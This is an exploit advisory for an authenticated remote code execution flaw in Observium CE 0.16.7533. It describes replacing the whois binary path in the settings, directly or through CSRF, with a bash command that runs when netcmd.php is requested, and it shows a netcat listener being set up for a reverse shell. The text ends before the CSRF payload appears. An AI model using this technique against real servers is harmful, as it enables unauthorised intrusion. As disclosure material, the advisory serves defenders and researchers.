# Exploit title: Observium Commercial - Authenticated RCE
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com
# Date: 28-04-2016
# Vendor homepage: http://observium.org/
# Software version: CE 0.16.7533 Authenticated remote code execution
Using either CSRF or by editing the whois binary field in the Observium webui under Settings-> System Path, an attacker may also change the Path to either [whois, mtr, nmap] to any bash command, and by hitting the url: http:///netcmd.php?cmd=whois&query=8.8.8.8
using any user on Observium (even low privileged) we can trigger a code execution. for example. setting up a listener root@pt:~# nc -lvp 4444
listening on [any] 4444 ... and a CSRF which looks like this:
